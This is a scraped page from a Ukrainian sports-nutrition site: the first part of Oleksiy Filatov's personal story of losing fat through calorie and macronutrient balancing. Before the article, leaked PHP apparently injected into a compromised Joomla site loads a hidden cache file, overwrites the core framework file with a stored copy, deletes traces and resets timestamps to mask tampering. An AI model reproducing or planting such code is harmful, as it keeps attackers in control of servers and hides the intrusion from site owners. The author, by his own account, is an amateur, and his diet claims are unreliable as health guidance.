$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Теорія и практика жироспалювання (1-16) | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Теорія и практика жироспалювання (1-16)

Сторінка 1 з 16
Автор: Олексій Філатов

ЗМІСТ

Мій досвід і моя історія

У свої 14 років я не знав, що таке калорії дієта, фізичні вправи і що таке жир. У дитинстві я був досить болючим: викривлення хребта, гастродуоденіт, дискінезія жовчовивідних шляхів, застуди 4 рази на рік, 2 рази на рік в лікарнях на обстеженнях, звільнення від фізкультури і мало не лікарняне харчування. У 16 років я потрапив у стандартну ситуацію, коли молодь починає курити, пити пиво, гуляти допізна, пропускати уроки в школі і взагалі вести себе не правильно. Правда курити я почав потайки ще в 9 років, але заявив свої права на доросле життя я тільки до 16-17. Потім все стабілізувалося і в 17 років я вступив до університету. Пити став менше, в основному пиво, курив уривками. Навіть намагався займатися спортом, але надовго мене не вистачало, тому що проблем з вагою не було, а пропаганди здорового способу життя не існувало в таких масштабах, як зараз.

І тут в 18,5 років я з жахом побачив себе на фотографії. Я не знав свою вагу і не вважав ніколи, що це взагалі має якесь значення. Встав на ваги і виявив цифру приблизно в 92 кг, але не злякався, тому що я не знав, багато це чи ні. Але те, що в старий одяг я не поміщався, а нова була схожа на мішок, наштовхнуло мене на певні міркування.

Я вирішив діяти. Спочатку засів в Інтернет і почав користуватися радикальними дієтами, на кшталт "схуднувши за 14 днів на 20 кг", дієта Аткінса, японська дієта, китайська, швидка, супер-діюча, революційна, жорстка дієта, голодна, монодієти, дієта Доліної, Баскова, гречана ... та інше. Який я був наївний ... Ви самі розумієте, що вага повертався, як тільки я переставав триматися на дієті.

Почав займатися спортом, записався айкідо, просто помирав від утоми, але мені вдалося скинути вагу до 78 кг якимись неймовірними зусиллями. Потім у житті відбулися зміни, айкідо кинув і знову набрав до 86-87, потім знову дієти, біг 5 разів на тиждень ... 75, потім знову зрив 87. Хоч убий не міг протриматися більше 3-4 місяців. Крім того, я просто ставав менше, але постать назвати красивою було не можна.

Мені казали: та годі тобі, змирися, у тебе повні батьки, у тебе така генетика, з цим нічого не поробиш, народжений товстим, худим бути не може. Але я-то народився не товстим ... тому розумів, що я допускаю помилки, але не міг зрозуміти, в чому саме.

Я почав збирати інформацію та аналізувати. В Інтернеті нарвався на маленьку статтю, в якій говорилося, що якщо ви сильно скорочуєте свій раціон і починаєте займатися фізичними навантаженнями, то спалюєте свої м'язи. Також було сказано, що м'язи необхідні для підтримки високого рівня обміну речовин і їх втрата в результаті виснажливих навантажень і недостатнього харчування обумовлює набір ваги наново за рахунок жиру. Я почав поступово розуміти, де я помилявся.

Знайшов книгу, назва якої вже точно не пам'ятаю, але щось типу "низьковуглеводна дієта- шлях до втрати жиру". Автор даної книги погоджувався з тим, що не можна сидіти на низькокалорійній дієті, але в усьому звинувачував вуглеводи, тому досить їсти більше білка і овочів і за калорійність можна не переживати. Я сів на дану дієту і результати були вражаючими ... до пори до часу, поки я не отримав занепад сил. 3-4 місяці без вуглеводів знизили ККД тренувань, і я після тренування йшов додому злий і розбитий. Правда стрілка, стабільно знижуються кожного ранку на 300-200, радувала мене ... Але тут я переїхав в іншу країну, і всього за 1 місяць повернув собі 10 кг. Почав харчуватися білим рисом, потім став пробувати інші вуглеводні смакоту-солодощі. Підсумок - 84 кг.

Я думав ... ну все, значить мені не дано. Адже я вже перепробував всі існуючі способи. Жити не хотілося, а займатися тим більше. Потім ще нарвався на статтю, в якій говорилося, що тренування зроблять вас товстим після того, як ви їх кинете, тому не треба займатися фізичними вправами. Я готовий бути ридати. Я працював стільки років, щоб мені сказали, що тренування були дарма ...

Десь випадково мій погляд упав на заголовок в Інтернеті, на англійській мові:

"Ви не можете схуднути? Може бути Ваш раціон не зовсім правильний? Не впадайте у відчай. Спробуйте що-небудь інше"

"Скинути жир - річ нехитра, але не проста, і вам доведеться трудитися тілом, і що не менш важливо, трудитися головою".

Було 12 статей про те, чому ми терпимо боротьбу з жиром, хоча при цьому працюємо, як прокляті в спортзалі. Ці 12 статей не справили на мене особливого враження, тому що, судячи з ним, все, що я знав і робив, було повністю неправильним. Стаття ні до чого не примушувала, там лише була рекомендація вирівняти свій раціон за формулою потреби в калоріях, що враховує спосіб життя, вік, зріст і вагу, а також позбутися від шкідливих продуктів і вирівняти баланс білків-жирів і вуглеводів так, щоб 50% припадало на вуглеводи, 30% на білки і 20% на жири. Також було розказано, як визначати, за рахунок чого ви худнете і як зрозуміти, що ви втрачаєте НЕ м'язи, а жир. Для цього пропонувалося виміряти відсоток жиру і подивитися, за рахунок чого ви худнете на вашій дієті, займаючись тренуваннями. Я пішов у центр тестування жиру і зафіксував результат: 83 кг ваги і 21% жиру.

Чесно кажучи, мені хотілося довести, що вони неправі, і я продовжував займатися за своєю програмою, сидячи на низьковуглеводні дієті, яка єдина давала непростий, але все-таки результат. Як потім виявилося, я сидів не тільки на низьковуглеводні дієті, але вона ще й була низькокалорійна, і я їв не більше 1000-1100 ккал на день, вбиваючи себе і свій метаболізм 5 разів на тиждень в залі. Але я завжди непогано себе "витискав" за 2-3 місяці на 4-5 кг, і був задоволений відміткою в 78-80 кг. Минуло 2,5 місяці після початку чергового "марш-кидка", я вирішив перевірити, скільки ж жиру я втратив. Я тоді взагалі мав слабке уявлення про те, що худнути за рахунок жиру і худнути в принципі - 2 різні речі. Я прийшов в центр, встав на ваги: 80 кг і 24% жиру - це 19,2 кг жиру!

Я не тільки не став худіший, але і навпаки став товщі майже на 2 кг жиру!!

Коли я повертався додому, мені не хотілося не те, що йти на наступний день в зал, мені хотілося померти від образи і відчаю.

До того часу я вже начитався форумів, де люди говорили, що якщо я народився товстим, то не судилося бути струнким ... Однак, я вирішив, що мені вже нічого втрачати. Гроші з мене ніхто не брав, тому я вирішив спробувати.

Я склав собі меню приблизно так, як порадили на сайті.

Коли я відварив рис, і поставив його собі на тарілку, то в мене було таке відчуття, ніби мене примушують з'їсти павука. Зітхнувши, я запхав у себе 100 г рису, потім у третій прийом їжі картоплину, а ще через 4 години знову рис. Мені довелось їсти у 2,5 рази більше, додаючи вуглеводи до того м'яса з салатом, які були моїм основним меню протягом майже 3 років.

На домашніх вагах без сканера жиру на наступний день стрілка "порадувала" мене додатком 350 г. Ну, сволочі! - Прошипів я про себе, я вже почав товстіти.

Але раціон не кинув. На роботі були труднощі, тому я вирішив собі дати тиждень "обжерливості" за рахунок рису і картоплі. Я подумав, що потім знову сяду на низкоуглеводку як тільки закінчиться важкий період.

Встав через 3 дні на ваги, ще плюс 200 р. Але я ще займався у спортзалі, регулярно 4-5 разів на тиждень.

Я вважав, що був правий - я товстію на вуглеводах. Але вуглеводи додали мені енергії, стало легше прокидатися вранці, і я вирішив забути про вагу. Гаразд, подумав я, хай краще буду повним, бадьорим і сильним, ніж худим, виснаженими і слабким. Пройшло 2 тижні тренувань і харчування за їх пропорцій. Я пішов у центр тестування жиру, встав на ваги з байдужістю злочинця, який сходить на ешафот. Дівчина вручила мені роздруківку з результатами.

19,6% жиру, 81 кг!

Неймовірно, завмер я ... вони були праві, я втратив тільки жир і зберіг м'язи. Стиснувши в руці роздруківку, помчав додому.

Зайшов на сайт, почав читати статті, читання мене поглинуло. Я ще не розумів, що побачив, але відчував, що вперше за 3 роки я знайшов правду серед моря дезінформації. Результат був вражаючим, але ж я їв рис і картоплю ...

Це здавалося неймовірним, але факт залишався фактом.

Я просидів на цій дієті ще 2 тижні, пішов у центр, боячись і сподіваючись, що результат буде поганим.

80 кг, 18% жиру!

Захопленню не було меж. Я втрачаю жир, справжній жир, а не м'язи! Я прочитав не тільки книгу Тома Венуто, але ще близько 30 книжок його послідовників, не кажучи вже про статті, форумах і блогах численних тих людей, хто успішно схуд за цією системою. По суті, я дізнався прописні істини, нічого надприродного. Якщо б я міг включити логіку і думати так, як я думаю зараз, то я б сам до всього дійшов. Простіше кажучи, я зміг зібрати до купи і проаналізувати мої уривчасті знання, які не працюють зокрема.

Це і надихнуло мене написати цю книгу і поділитися з вами інформацією, яка фактично врятувала мене.

Минув час, за який я повністю змінив свій погляд на тренування і харчування. На сьогоднішній час моя вага 74,6 кг і 9,4% жиру (на початок лютого 2008 року). Весь одяг просто бовтається, хоча я вже 2-3 рази змінював гардероб.

Це не дієта - це стиль життя. Всі фітнес-моделі, яких ви бачите на обкладинках, дотримуються цієї системи харчування і тренувань, яку в остаточному вигляді оформив Том Венуто і його послідовники. Це цілий напрям в американській школі жиро спалювання  (яка, до речі, є найсильнішою у світі), яке я знайшов, застосував, адаптував до української дійсності і надав вашій увазі.

Ви можете не враховувати мою думку, бо я не професіонал і не маю сертифікатів. Якщо тільки сертифіковані фахівці викликають у вас повагу і довіру, то ви завжди вільні у своєму виборі.

Якщо ви готові, тоді починаємо ...

наступна> ЗМІСТ 
Харчування-здоровий спосіб життя Теорія и практика жироспалювання (1-16)